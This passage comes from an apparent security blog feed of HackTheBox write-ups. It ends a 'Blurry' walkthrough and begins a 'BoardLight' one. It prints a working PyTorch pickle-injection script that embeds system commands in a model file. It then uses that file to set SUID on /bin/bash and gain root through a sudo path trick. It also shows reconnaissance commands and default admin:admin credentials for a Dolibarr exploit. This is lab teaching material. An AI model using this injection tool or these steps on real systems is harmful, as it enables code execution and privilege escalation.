</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">def</span> <span style="color:#fabd2f">evaluate_model</span>(model, dataloader):
</span></span><span style="display:flex;"><span> correct <span style="color:#fe8019">=</span> <span style="color:#d3869b">0</span>
</span></span><span style="display:flex;"><span> total <span style="color:#fe8019">=</span> <span style="color:#d3869b">0</span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">with</span> torch<span style="color:#fe8019">.</span>no_grad():
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">for</span> images, labels <span style="color:#fe8019">in</span> dataloader:
</span></span><span style="display:flex;"><span> outputs <span style="color:#fe8019">=</span> model(images)
</span></span><span style="display:flex;"><span> _, predicted <span style="color:#fe8019">=</span> torch<span style="color:#fe8019">.</span>max(outputs<span style="color:#fe8019">.</span>data, <span style="color:#d3869b">1</span>)
</span></span><span style="display:flex;"><span> total <span style="color:#fe8019">+=</span> labels<span style="color:#fe8019">.</span>size(<span style="color:#d3869b">0</span>)
</span></span><span style="display:flex;"><span> correct <span style="color:#fe8019">+=</span> (predicted <span style="color:#fe8019">==</span> labels)<span style="color:#fe8019">.</span>sum()<span style="color:#fe8019">.</span>item()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> accuracy <span style="color:#fe8019">=</span> <span style="color:#d3869b">100</span> <span style="color:#fe8019">*</span> correct <span style="color:#fe8019">/</span> total
</span></span><span style="display:flex;"><span> <span style="color:#fabd2f">print</span>(<span style="color:#b8bb26">f</span><span style="color:#b8bb26">&#39;[+] Accuracy of the model on the test dataset: </span><span style="color:#b8bb26">{</span>accuracy<span style="color:#b8bb26">:</span><span style="color:#b8bb26">.2f</span><span style="color:#b8bb26">}</span><span style="color:#b8bb26">%&#39;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">def</span> <span style="color:#fabd2f">main</span>(model_path):
</span></span><span style="display:flex;"><span> model <span style="color:#fe8019">=</span> load_model(model_path)
</span></span><span style="display:flex;"><span> <span style="color:#fabd2f">print</span>(<span style="color:#b8bb26">&#34;[+] Loaded Model.&#34;</span>)
</span></span><span style="display:flex;"><span> dataloader <span style="color:#fe8019">=</span> prepare_dataloader()
</span></span><span style="display:flex;"><span> <span style="color:#fabd2f">print</span>(<span style="color:#b8bb26">&#34;[+] Dataloader ready. Evaluating model...&#34;</span>)
</span></span><span style="display:flex;"><span> evaluate_model(model, dataloader)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">if</span> __name__ <span style="color:#fe8019">==</span> <span style="color:#b8bb26">&#34;__main__&#34;</span>:
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">if</span> <span style="color:#fabd2f">len</span>(sys<span style="color:#fe8019">.</span>argv) <span style="color:#fe8019">&lt;</span> <span style="color:#d3869b">2</span>:
</span></span><span style="display:flex;"><span> <span style="color:#fabd2f">print</span>(<span style="color:#b8bb26">&#34;Usage: python script.py &lt;path_to_model.pth&gt;&#34;</span>)
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">else</span>:
</span></span><span style="display:flex;"><span> model_path <span style="color:#fe8019">=</span> sys<span style="color:#fe8019">.</span>argv[<span style="color:#d3869b">1</span>] <span style="color:#928374;font-style:italic"># Path to the .pth file</span>
</span></span><span style="display:flex;"><span> main(model_path)
</span></span></code></pre></div><p>In order for us to load a malicious pickle file and run arbitrary commands, we need to create a pickle file that bypasses the checks of<code>fickling</code>.
After some searching, I found another blog by Hiddenlayer: <a href="https://hiddenlayer.com/research/weaponizing-machine-learning-models-with-ransomware/">Weaponizing ML Models with Ransomware</a>. The blog post explains some techniques which we can use to modify exisitng models to execute arbitrary commands.
There&rsquo;s already a pretrained PyTorch model in the <code>/models</code> directory. <code>.pth</code> files are used in PyTorch to sore model weights and other relevant infomation for deep learning models. If we extract the <code>demo_model.pth</code> file we can see there&rsquo;s a <code>data.pkl</code> file inside it.
<img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013170347.webp" alt=""></p>
<p>We can inject the model’s <code>data.pkl</code> file with an instruction to execute arbitrary code using the python script from the blog.</p>
<h2 id="privilege-escalation-1">Privilege Escalation</h2>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#fe8019">import</span> os
</span></span><span style="display:flex;"><span><span style="color:#fe8019">import</span> argparse
</span></span><span style="display:flex;"><span><span style="color:#fe8019">import</span> pickle
</span></span><span style="display:flex;"><span><span style="color:#fe8019">import</span> struct
</span></span><span style="display:flex;"><span><span style="color:#fe8019">import</span> shutil
</span></span><span style="display:flex;"><span><span style="color:#fe8019">from</span> pathlib <span style="color:#fe8019">import</span> Path
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">import</span> torch
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">class</span> PickleInject():
</span></span><span style="display:flex;"><span> <span style="color:#b8bb26">&#34;&#34;&#34;Pickle injection. Pretends to be a &#34;module&#34; to work with torch.&#34;&#34;&#34;</span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">def</span> __init__(self, inj_objs, first<span style="color:#fe8019">=</span><span style="color:#fe8019">True</span>):
</span></span><span style="display:flex;"><span> self<span style="color:#fe8019">.</span>__name__ <span style="color:#fe8019">=</span> <span style="color:#b8bb26">&#34;pickle_inject&#34;</span>
</span></span><span style="display:flex;"><span> self<span style="color:#fe8019">.</span>inj_objs <span style="color:#fe8019">=</span> inj_objs
</span></span><span style="display:flex;"><span> self<span style="color:#fe8019">.</span>first <span style="color:#fe8019">=</span> first
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">class</span> _Pickler(pickle<span style="color:#fe8019">.</span>_Pickler):
</span></span><span style="display:flex;"><span> <span style="color:#b8bb26">&#34;&#34;&#34;Reimplementation of Pickler with support for injection&#34;&#34;&#34;</span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">def</span> __init__(self, file, protocol, inj_objs, first<span style="color:#fe8019">=</span><span style="color:#fe8019">True</span>):
</span></span><span style="display:flex;"><span> <span style="color:#fabd2f">super</span>()<span style="color:#fe8019">.</span>__init__(file, protocol)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> self<span style="color:#fe8019">.</span>inj_objs <span style="color:#fe8019">=</span> inj_objs
</span></span><span style="display:flex;"><span> self<span style="color:#fe8019">.</span>first <span style="color:#fe8019">=</span> first
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">def</span> <span style="color:#fabd2f">dump</span>(self, obj):
</span></span><span style="display:flex;"><span> <span style="color:#b8bb26">&#34;&#34;&#34;Pickle data, inject object before or after&#34;&#34;&#34;</span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">if</span> self<span style="color:#fe8019">.</span>proto <span style="color:#fe8019">&gt;=</span> <span style="color:#d3869b">2</span>:
</span></span><span style="display:flex;"><span> self<span style="color:#fe8019">.</span>write(pickle<span style="color:#fe8019">.</span>PROTO <span style="color:#fe8019">+</span> struct<span style="color:#fe8019">.</span>pack(<span style="color:#b8bb26">&#34;&lt;B&#34;</span>, self<span style="color:#fe8019">.</span>proto))
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">if</span> self<span style="color:#fe8019">.</span>proto <span style="color:#fe8019">&gt;=</span> <span style="color:#d3869b">4</span>:
</span></span><span style="display:flex;"><span> self<span style="color:#fe8019">.</span>framer<span style="color:#fe8019">.</span>start_framing()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> <span style="color:#928374;font-style:italic"># Inject the object(s) before the user-supplied data?</span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">if</span> self<span style="color:#fe8019">.</span>first:
</span></span><span style="display:flex;"><span> <span style="color:#928374;font-style:italic"># Pickle injected objects</span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">for</span> inj_obj <span style="color:#fe8019">in</span> self<span style="color:#fe8019">.</span>inj_objs:
</span></span><span style="display:flex;"><span> self<span style="color:#fe8019">.</span>save(inj_obj)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> <span style="color:#928374;font-style:italic"># Pickle user-supplied data</span>
</span></span><span style="display:flex;"><span> self<span style="color:#fe8019">.</span>save(obj)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> <span style="color:#928374;font-style:italic"># Inject the object(s) after the user-supplied data?</span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">if</span> <span style="color:#fe8019">not</span> self<span style="color:#fe8019">.</span>first:
</span></span><span style="display:flex;"><span> <span style="color:#928374;font-style:italic"># Pickle injected objects</span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">for</span> inj_obj <span style="color:#fe8019">in</span> self<span style="color:#fe8019">.</span>inj_objs:
</span></span><span style="display:flex;"><span> self<span style="color:#fe8019">.</span>save(inj_obj)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> self<span style="color:#fe8019">.</span>write(pickle<span style="color:#fe8019">.</span>STOP)
</span></span><span style="display:flex;"><span> self<span style="color:#fe8019">.</span>framer<span style="color:#fe8019">.</span>end_framing()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">def</span> <span style="color:#fabd2f">Pickler</span>(self, file, protocol):
</span></span><span style="display:flex;"><span> <span style="color:#928374;font-style:italic"># Initialise the pickler interface with the injected object</span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">return</span> self<span style="color:#fe8019">.</span>_Pickler(file, protocol, self<span style="color:#fe8019">.</span>inj_objs)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">class</span> _PickleInject():
</span></span><span style="display:flex;"><span> <span style="color:#b8bb26">&#34;&#34;&#34;Base class for pickling injected commands&#34;&#34;&#34;</span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">def</span> __init__(self, args, command<span style="color:#fe8019">=</span><span style="color:#fe8019">None</span>):
</span></span><span style="display:flex;"><span> self<span style="color:#fe8019">.</span>command <span style="color:#fe8019">=</span> command
</span></span><span style="display:flex;"><span> self<span style="color:#fe8019">.</span>args <span style="color:#fe8019">=</span> args
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">def</span> <span style="color:#fabd2f">__reduce__</span>(self):
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">return</span> self<span style="color:#fe8019">.</span>command, (self<span style="color:#fe8019">.</span>args,)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">class</span> System(_PickleInject):
</span></span><span style="display:flex;"><span> <span style="color:#b8bb26">&#34;&#34;&#34;Create os.system command&#34;&#34;&#34;</span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">def</span> __init__(self, args):
</span></span><span style="display:flex;"><span> <span style="color:#fabd2f">super</span>()<span style="color:#fe8019">.</span>__init__(args, command<span style="color:#fe8019">=</span>os<span style="color:#fe8019">.</span>system)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">class</span> Exec(_PickleInject):
</span></span><span style="display:flex;"><span> <span style="color:#b8bb26">&#34;&#34;&#34;Create exec command&#34;&#34;&#34;</span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">def</span> __init__(self, args):
</span></span><span style="display:flex;"><span> <span style="color:#fabd2f">super</span>()<span style="color:#fe8019">.</span>__init__(args, command<span style="color:#fe8019">=</span>exec)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">class</span> Eval(_PickleInject):
</span></span><span style="display:flex;"><span> <span style="color:#b8bb26">&#34;&#34;&#34;Create eval command&#34;&#34;&#34;</span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">def</span> __init__(self, args):
</span></span><span style="display:flex;"><span> <span style="color:#fabd2f">super</span>()<span style="color:#fe8019">.</span>__init__(args, command<span style="color:#fe8019">=</span><span style="color:#fabd2f">eval</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">class</span> RunPy(_PickleInject):
</span></span><span style="display:flex;"><span> <span style="color:#b8bb26">&#34;&#34;&#34;Create runpy command&#34;&#34;&#34;</span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">def</span> __init__(self, args):
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">import</span> runpy
</span></span><span style="display:flex;"><span> <span style="color:#fabd2f">super</span>()<span style="color:#fe8019">.</span>__init__(args, command<span style="color:#fe8019">=</span>runpy<span style="color:#fe8019">.</span>_run_code)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">def</span> <span style="color:#fabd2f">__reduce__</span>(self):
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">return</span> self<span style="color:#fe8019">.</span>command, (self<span style="color:#fe8019">.</span>args,{})
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>parser <span style="color:#fe8019">=</span> argparse<span style="color:#fe8019">.</span>ArgumentParser(description<span style="color:#fe8019">=</span><span style="color:#b8bb26">&#34;PyTorch Pickle Inject&#34;</span>)
</span></span><span style="display:flex;"><span>parser<span style="color:#fe8019">.</span>add_argument(<span style="color:#b8bb26">&#34;model&#34;</span>, <span style="color:#fabd2f">type</span><span style="color:#fe8019">=</span>Path)
</span></span><span style="display:flex;"><span>parser<span style="color:#fe8019">.</span>add_argument(<span style="color:#b8bb26">&#34;command&#34;</span>, choices<span style="color:#fe8019">=</span>[<span style="color:#b8bb26">&#34;system&#34;</span>, <span style="color:#b8bb26">&#34;exec&#34;</span>, <span style="color:#b8bb26">&#34;eval&#34;</span>, <span style="color:#b8bb26">&#34;runpy&#34;</span>])
</span></span><span style="display:flex;"><span>parser<span style="color:#fe8019">.</span>add_argument(<span style="color:#b8bb26">&#34;args&#34;</span>)
</span></span><span style="display:flex;"><span>parser<span style="color:#fe8019">.</span>add_argument(<span style="color:#b8bb26">&#34;-v&#34;</span>, <span style="color:#b8bb26">&#34;--verbose&#34;</span>, help<span style="color:#fe8019">=</span><span style="color:#b8bb26">&#34;verbose logging&#34;</span>, action<span style="color:#fe8019">=</span><span style="color:#b8bb26">&#34;count&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>args <span style="color:#fe8019">=</span> parser<span style="color:#fe8019">.</span>parse_args()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>command_args <span style="color:#fe8019">=</span> args<span style="color:#fe8019">.</span>args
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#928374;font-style:italic"># If the command arg is a path, read the file contents</span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">if</span> os<span style="color:#fe8019">.</span>path<span style="color:#fe8019">.</span>isfile(command_args):
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">with</span> <span style="color:#fabd2f">open</span>(command_args, <span style="color:#b8bb26">&#34;r&#34;</span>) <span style="color:#fe8019">as</span> in_file:
</span></span><span style="display:flex;"><span> command_args <span style="color:#fe8019">=</span> in_file<span style="color:#fe8019">.</span>read()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#928374;font-style:italic"># Construct payload</span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">if</span> args<span style="color:#fe8019">.</span>command <span style="color:#fe8019">==</span> <span style="color:#b8bb26">&#34;system&#34;</span>:
</span></span><span style="display:flex;"><span> payload <span style="color:#fe8019">=</span> PickleInject<span style="color:#fe8019">.</span>System(command_args)
</span></span><span style="display:flex;"><span><span style="color:#fe8019">elif</span> args<span style="color:#fe8019">.</span>command <span style="color:#fe8019">==</span> <span style="color:#b8bb26">&#34;exec&#34;</span>:
</span></span><span style="display:flex;"><span> payload <span style="color:#fe8019">=</span> PickleInject<span style="color:#fe8019">.</span>Exec(command_args)
</span></span><span style="display:flex;"><span><span style="color:#fe8019">elif</span> args<span style="color:#fe8019">.</span>command <span style="color:#fe8019">==</span> <span style="color:#b8bb26">&#34;eval&#34;</span>:
</span></span><span style="display:flex;"><span> payload <span style="color:#fe8019">=</span> PickleInject<span style="color:#fe8019">.</span>Eval(command_args)
</span></span><span style="display:flex;"><span><span style="color:#fe8019">elif</span> args<span style="color:#fe8019">.</span>command <span style="color:#fe8019">==</span> <span style="color:#b8bb26">&#34;runpy&#34;</span>:
</span></span><span style="display:flex;"><span> payload <span style="color:#fe8019">=</span> PickleInject<span style="color:#fe8019">.</span>RunPy(command_args)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#928374;font-style:italic"># Backup the model</span>
</span></span><span style="display:flex;"><span>backup_path <span style="color:#fe8019">=</span> <span style="color:#b8bb26">&#34;</span><span style="color:#b8bb26">{}</span><span style="color:#b8bb26">.bak&#34;</span><span style="color:#fe8019">.</span>format(args<span style="color:#fe8019">.</span>model)
</span></span><span style="display:flex;"><span>shutil<span style="color:#fe8019">.</span>copyfile(args<span style="color:#fe8019">.</span>model, backup_path)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#928374;font-style:italic"># Save the model with the injected payload</span>
</span></span><span style="display:flex;"><span>torch<span style="color:#fe8019">.</span>save(torch<span style="color:#fe8019">.</span>load(args<span style="color:#fe8019">.</span>model), f<span style="color:#fe8019">=</span>args<span style="color:#fe8019">.</span>model, pickle_module<span style="color:#fe8019">=</span>PickleInject([payload]))
</span></span></code></pre></div><p>Copy the code to the <code>/tmp/</code> folder.
Now we have to make a copy of <code>/models/demo_model.pth</code> file to <code>/tmp</code> and use the script to inject code.</p>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span><span style="color:#fabd2f">cd</span> /tmp
</span></span><span style="display:flex;"><span>cp /models/demo_model.pth .
</span></span><span style="display:flex;"><span>python3 main.py ./demo_model.pth system <span style="color:#b8bb26">&#39;chmod u+s /bin/bash&#39;</span>
</span></span></code></pre></div><p>This will modify the original model that now executes <code>chmod u+s /bin/bash</code> and also create a backup of the original file.
<img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013161804.webp" alt="">
Now we just have to move this updated model into <code>/models/</code> and run it with <code>/usr/bin/evaluate_model</code> command.
<img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013162052.webp" alt="">
Since there&rsquo;s an <code>*</code> in the path, we don&rsquo;t exactly need to move the updated model into the <code>/models/</code> directory.</p>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>sudo /usr/bin/evaluate_model /models/../tmp/demo_model.pth
</span></span></code></pre></div><p><img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013162253.webp" alt="">
And we are root.</p>
<p>This machine mainly focuses on addressing security aspects essential for maintaining robust MLOps practices.
We explored the exploitation of a remote code execution vulnerability (CVE-2024-24590) in ClearML through malicious artifact uploads. By leveraging the insecure deserialization of pickle files, we demonstrated how an attacker could execute arbitrary code on a victim&rsquo;s system. We also discussed the privilege escalation technique, using a crafted PyTorch model to gain root access.</p>
<h3 id="references">References:</h3>
<ul>
<li><a href="https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/">Machine Learning Operations: What You Need to Know Now - HiddenLayer</a></li>
<li><a href="https://www.hackingarticles.in/python-serialization-vulnerabilities-pickle/">Python Serialization Vulnerabilities – Pickle</a></li>
<li><a href="https://intoli.com/blog/dangerous-pickles/">Dangerous Pickles — Malicious Python Serialization</a></li>
<li><a href="https://hiddenlayer.com/research/weaponizing-machine-learning-models-with-ransomware/">Weaponizing ML Models with Ransomware</a></li>
</ul></content></item><item><title>BoardLight | HackTheBox</title><link>https://h4r1337.github.io/posts/board-light/</link><pubDate>Sat, 28 Sep 2024 22:01:42 +0530</pubDate><guid>https://h4r1337.github.io/posts/board-light/</guid><description><h2 id="overview">Overview</h2>
<img src="https://h4r1337.github.io/img/boardlight/cover.webp" alt=""><table>
<thead>
<tr>
<th style="text-align: center">Title</th>
<th style="text-align: center"><a href="https://app.hackthebox.com/machines/BoardLight">BoardLight</a></th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: center">Difficulty</td>
<td style="text-align: center">Easy</td>
</tr>
<tr>
<td style="text-align: center">Machine</td>
<td style="text-align: center">Linux</td>
</tr>
<tr>
<td style="text-align: center">Maker</td>
<td style="text-align: center"><a href="https://app.hackthebox.com/users/116842"><img src="https://www.hackthebox.com/badge/image/116842" alt="" style="display: unset"></a></td>
</tr>
</tbody>
</table>
<br>
<div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
<div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
<i
class="bx bx-bulb"
style="color: #bdbb26;"
></i>
<p
class="alert-heading"
style="color: #bdbb26"
>
About BoardLight
</p>
<i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
></i>
</div>
<div class="alert-content" style="display: none;">
<p>BoardLight is an easy difficulty Linux machine that features a <code>Dolibarr</code> instance vulnerable to <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-30253">CVE-2023-30253</a>. This vulnerability is leveraged to gain access as <code>www-data</code>. After enumerating and dumping the web configuration file contents, plaintext credentials lead to <code>SSH</code> access to the machine. Enumerating the system, a <code>SUID</code> binary related to <code>enlightenment</code> is identified which is vulnerable to privilege escalation via <a href="https://nvd.nist.gov/vuln/detail/CVE-2022-37706">CVE-2022-37706</a> and can be abused to leverage a root shell.</p></description><content><h2 id="overview">Overview</h2>
<img src="https://h4r1337.github.io/img/boardlight/cover.webp" alt=""><table>
<thead>
<tr>
<th style="text-align: center">Title</th>
<th style="text-align: center"><a href="https://app.hackthebox.com/machines/BoardLight">BoardLight</a></th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: center">Difficulty</td>
<td style="text-align: center">Easy</td>
</tr>
<tr>
<td style="text-align: center">Machine</td>
<td style="text-align: center">Linux</td>
</tr>
<tr>
<td style="text-align: center">Maker</td>
<td style="text-align: center"><a href="https://app.hackthebox.com/users/116842"><img src="https://www.hackthebox.com/badge/image/116842" alt="" style="display: unset"></a></td>
</tr>
</tbody>
</table>
<br>
<div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
<div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
<i
class="bx bx-bulb"
style="color: #bdbb26;"
></i>
<p
class="alert-heading"
style="color: #bdbb26"
>
About BoardLight
</p>
<i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
></i>
</div>
<div class="alert-content" style="display: none;">
<p>BoardLight is an easy difficulty Linux machine that features a <code>Dolibarr</code> instance vulnerable to <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-30253">CVE-2023-30253</a>. This vulnerability is leveraged to gain access as <code>www-data</code>. After enumerating and dumping the web configuration file contents, plaintext credentials lead to <code>SSH</code> access to the machine. Enumerating the system, a <code>SUID</code> binary related to <code>enlightenment</code> is identified which is vulnerable to privilege escalation via <a href="https://nvd.nist.gov/vuln/detail/CVE-2022-37706">CVE-2022-37706</a> and can be abused to leverage a root shell.</p>
</div>
</div>
<script>
function toggleAlert(headerElement) {
var alertBox = headerElement.parentElement;
var alertContent = alertBox.querySelector('.alert-content');
var icon = headerElement.querySelectorAll('i')[1];
alertBox.classList.toggle('open');
alertBox.classList.toggle('collapsed');
if (alertBox.classList.contains('open')) {
alertContent.style.display = 'block';
icon.classList.remove('open');
icon.classList.add('collapsed');
} else {
icon.classList.remove('collapsed');
icon.classList.add('open');
alertContent.style.display = 'none';
}
}
</script>
<h1 id="information-gathering">Information Gathering</h1>
<p>Scanned all TCP ports:</p>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>nmap -p- -vv -Pn -T4 --min-rate <span style="color:#d3869b">1000</span> -oA nmap/ports 10.10.11.11
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>Nmap scan report <span style="color:#fe8019">for</span> 10.10.11.11
</span></span><span style="display:flex;"><span>Host is up, received user-set <span style="color:#fe8019">(</span>0.15s latency<span style="color:#fe8019">)</span>.
</span></span><span style="display:flex;"><span>Scanned at 2024-05-28 11:16:43 IST <span style="color:#fe8019">for</span> 82s
</span></span><span style="display:flex;"><span>Not shown: <span style="color:#d3869b">65107</span> closed ports, <span style="color:#d3869b">426</span> filtered ports
</span></span><span style="display:flex;"><span>Reason: <span style="color:#d3869b">65107</span> conn-refused and <span style="color:#d3869b">426</span> no-responses
</span></span><span style="display:flex;"><span>PORT STATE SERVICE REASON
</span></span><span style="display:flex;"><span>22/tcp open ssh syn-ack
</span></span><span style="display:flex;"><span>80/tcp open http syn-ack
</span></span></code></pre></div><p>Enumerated open TCP ports:</p>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>nmap -p22,80 -sC -sV -vv -Pn -T4 --min-rate <span style="color:#d3869b">1000</span> -oA nmap/services 10.10.11.11
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>Nmap scan report <span style="color:#fe8019">for</span> board.htb <span style="color:#fe8019">(</span>10.10.11.11<span style="color:#fe8019">)</span>
</span></span><span style="display:flex;"><span>Host is up, received user-set <span style="color:#fe8019">(</span>0.27s latency<span style="color:#fe8019">)</span>.
</span></span><span style="display:flex;"><span>Scanned at 2024-05-28 11:23:23 IST <span style="color:#fe8019">for</span> 14s
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>PORT STATE SERVICE REASON VERSION
</span></span><span style="display:flex;"><span>22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 <span style="color:#fe8019">(</span>Ubuntu Linux; protocol 2.0<span style="color:#fe8019">)</span>
</span></span><span style="display:flex;"><span>80/tcp open http syn-ack Apache httpd 2.4.41 <span style="color:#fe8019">((</span>Ubuntu<span style="color:#fe8019">))</span>
</span></span><span style="display:flex;"><span>| http-methods:
</span></span><span style="display:flex;"><span>|_ Supported Methods: GET HEAD POST OPTIONS
</span></span><span style="display:flex;"><span>|_http-server-header: Apache/2.4.41 <span style="color:#fe8019">(</span>Ubuntu<span style="color:#fe8019">)</span>
</span></span><span style="display:flex;"><span>|_http-title: Site doesn&#39;t have a title <span style="color:#fe8019">(</span>text/html; charset<span style="color:#fe8019">=</span>UTF-8<span style="color:#fe8019">)</span>.
</span></span><span style="display:flex;"><span>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</span></span></code></pre></div><h2 id="port-80---http-apache-2441">Port 80 - HTTP (Apache <code>2.4.41</code>)</h2>
<img src="https://h4r1337.github.io/img/boardlight/Pasted%20image%2020240528112158.webp" alt=""><img src="https://h4r1337.github.io/img/boardlight/Pasted%20image%2020240528114524.webp" alt=""><p>I couldn&rsquo;t find nothing from these endpoints and the <code>contact.php</code> is not even sending
any data.
After that I decided to start VHOST Enumeration using Ffuf:</p>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>ffuf -u http://board.htb/ -H <span style="color:#b8bb26">&#39;Host: FUZZ.board.htb&#39;</span> -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs <span style="color:#d3869b">15949</span>
</span></span></code></pre></div><img src="https://h4r1337.github.io/img/boardlight/Pasted%20image%2020240528120726.webp" alt=""><h2 id="crmboardcom---dolibarr-1700">crm.board.com - <code>Dolibarr 17.0.0</code></h2>
<img src="https://h4r1337.github.io/img/boardlight/Pasted%20image%2020240528120841.webp" alt=""><p>Found one valid domain that runs <code>Dolibarr 17.0.0</code></p>
<h1 id="exploitation">Exploitation</h1>
<h2 id="cve-2023-30253"><code>CVE-2023-30253</code></h2>
<p>Found an exploit for Dolibarr 17.0.0: <a href="https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253">https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253</a>
To run this exploit we need a working username and password. After some googling, found <code>admin:admin</code> as the default
credentials. And it is working in the target.
<img src="https://h4r1337.github.io/img/boardlight/Pasted%20image%2020240528122837.webp" alt="">